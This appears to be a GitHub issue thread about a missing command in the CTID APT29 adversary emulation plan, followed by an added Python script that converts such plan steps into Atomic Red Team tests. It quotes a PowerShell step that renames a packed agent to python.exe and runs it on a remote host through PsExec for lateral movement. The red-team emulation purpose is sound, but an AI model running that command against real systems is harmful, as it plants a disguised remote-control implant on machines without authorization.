Open Guillaume-Muller opened 3 years ago
Hello,
It is missing, but it should not be a problem execution-wise, as the part that is actually executed by caldera is line 1722:
```yaml
platforms:
  windows:
    psh,pwsh:
      command: |
        move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
        set-location "C:\Program Files\SysinternalsSuite\";
        .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
        tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
      payloads:
      - sandcat.go-windows-upx
```
Thanks for your fast reply.
I'm currently a student and I'm trying to build a conversion script (like "ctid_aep_to_caldera.py") in order to use the YAML file with the Atomic framework. It is easier for me to directly copy the "executor" part because the Atomic YAML file is very similar (example below). By the way, don't you have that kind of script to convert to ATOMIC?
Atomic YAML file:
```yaml
supported_platforms:
name: powershell
```
> On Fri, 2 Jul 2021 at 11:21, Thamane @.***> wrote:
>
> Hello,
> It is missing, but it should not be a problem execution-wise, as the part that is actually executed by caldera is line 1722 (https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/6e8b057cf176619468fa3200c09dbdac4789f5f2/apt29/Emulation_Plan/yaml/APT29.yaml#L1722):
>
> ```yaml
> platforms:
>   windows:
>     psh,pwsh:
>       command: |
>         move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
>         set-location "C:\Program Files\SysinternalsSuite\";
>         .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
>         tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
>       payloads:
>       - sandcat.go-windows-upx
> ```
-- Regards,
Guillaume MULLER
Sorry I do not have such a script at hand.
In your case, just copying the command at line 1722 and pasting it at line 1749 will solve your problem. The `executors` YAML key is not parsed by caldera and is probably here for backward compatibility/cross-compatibility with other frameworks like ATOMIC? At least that is what is explained in this blog article:
> The machine-readable Emulation Plan representation would be implemented in YAML. The YAML format would be as consistent as possible with accepted industry approaches to automated emulation. In the case of our YAML format, we started from the established Red Canary Atomic Red Team format but made some modifications to capture the threat intelligence that informs the emulation and to ensure a direct correlation between the human-readable and machine-readable versions of the Emulation Plan.
In the APT29 YAML file, at line 1749, the command of T1105 is missing below the "executors" tag:
```
line 1746   executors:
line 1747   - name: powershell
line 1748     command: |
line 1749
line 1750 - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a
```
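The thread describes two things a converter has to deal with: the Atomic Red Team layout that the CTID plan was derived from (`supported_platforms`, `executor.name`, `executor.command`), and the fact that the `executors[].command` of a step can be empty while the real command lives under `platforms.windows."psh,pwsh".command`, which is what caldera actually runs. The script below is an added example written for this thread; it is not `ctid_aep_to_caldera.py` or any other code from the adversary_emulation_library project. It works on a step that has already been parsed into a Python dict (the shape `yaml.safe_load` would return for one list entry of `APT29.yaml`), so it needs no third-party library. The sample step, its ids, the technique id `T0000` and its harmless `Get-Process` command are all constructed placeholders, and the mapping from CTID executor keys such as `psh,pwsh` to Atomic executor names is my assumption, not a documented contract of either format.

```python
"""Convert one CTID Adversary Emulation Plan step into an Atomic Red Team test.

Added example, not part of the adversary_emulation_library project. Input is the
parsed YAML of one step (a dict). The command is taken from executors[] when that
entry is populated and otherwise from platforms.<os>.<executor>.command, which
is the "copy line 1722 to line 1749" fix described in the thread.
"""
from typing import Any, Dict, Tuple

# Constructed sample step: executor command left empty, real command under
# platforms, exactly the situation reported for line 1749. The command itself is
# a harmless placeholder, not the plan's own PsExec line.
SAMPLE_STEP: Dict[str, Any] = {
    "id": "00000000-0000-0000-0000-000000000000",  # placeholder id
    "name": "Example step",
    "description": "Constructed example step.",
    "tactic": "discovery",
    "technique": {"attack_id": "T0000", "name": "Placeholder technique"},  # placeholder
    "platforms": {
        "windows": {
            "psh,pwsh": {
                "command": "Get-Process -Name python | Select-Object Id, Path;\n",
                "payloads": ["sandcat.go-windows-upx"],
            }
        }
    },
    "executors": [{"name": "powershell", "command": ""}],
}

# Assumed mapping from CTID executor keys to Atomic Red Team executor names.
EXECUTOR_NAMES = {
    "psh,pwsh": "powershell", "psh": "powershell", "pwsh": "powershell",
    "cmd": "command_prompt", "sh": "sh", "bash": "bash",
}


def resolve_command(step: Dict[str, Any]) -> Tuple[str, str]:
    """Return (atomic executor name, command text) for a step.

    A populated executors[] entry wins; a blank one falls back to the platforms
    block so an empty 'command: |' (as at line 1749) does not produce an empty test.
    """
    for ex in step.get("executors") or []:
        if (ex.get("command") or "").strip():
            return ex["name"], ex["command"]
    for _os, executors in (step.get("platforms") or {}).items():
        for key, body in (executors or {}).items():
            cmd = (body or {}).get("command") or ""
            if cmd.strip():
                return EXECUTOR_NAMES.get(key, key), cmd
    raise ValueError(f"step {step.get('id')} has no command in executors or platforms")


def to_atomic_test(step: Dict[str, Any]) -> Dict[str, Any]:
    """Build the dict form of one Atomic Red Team test from a CTID step."""
    name, command = resolve_command(step)
    return {
        "name": step["name"],
        "description": step.get("description", ""),
        "supported_platforms": sorted((step.get("platforms") or {}).keys()),
        "executor": {"name": name, "command": command, "elevation_required": False},
    }


def to_atomic_yaml(step: Dict[str, Any]) -> str:
    """Render the test as an Atomic Red Team technique file (fixed layout, so
    no YAML emitter is needed; the command goes into a literal block scalar)."""
    t = to_atomic_test(step)
    lines = [
        f"attack_technique: {step['technique']['attack_id']}",
        f"display_name: {step['technique']['name']}",
        "atomic_tests:",
        f"- name: {t['name']}",
        f"  description: {t['description']}",
        "  supported_platforms:",
    ]
    lines += [f"  - {p}" for p in t["supported_platforms"]]
    lines += ["  executor:", f"    name: {t['executor']['name']}", "    command: |"]
    lines += [f"      {line}" for line in t["executor"]["command"].rstrip("\n").splitlines()]
    lines.append("    elevation_required: false")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(to_atomic_yaml(SAMPLE_STEP))
```

To run it over the real plan, load `APT29.yaml` with `yaml.safe_load`, pass each step dict to `to_atomic_yaml`, and group the results by `technique.attack_id` into one file per technique; steps whose `executors` entry is populated are converted unchanged, and the fallback only kicks in for the empty ones.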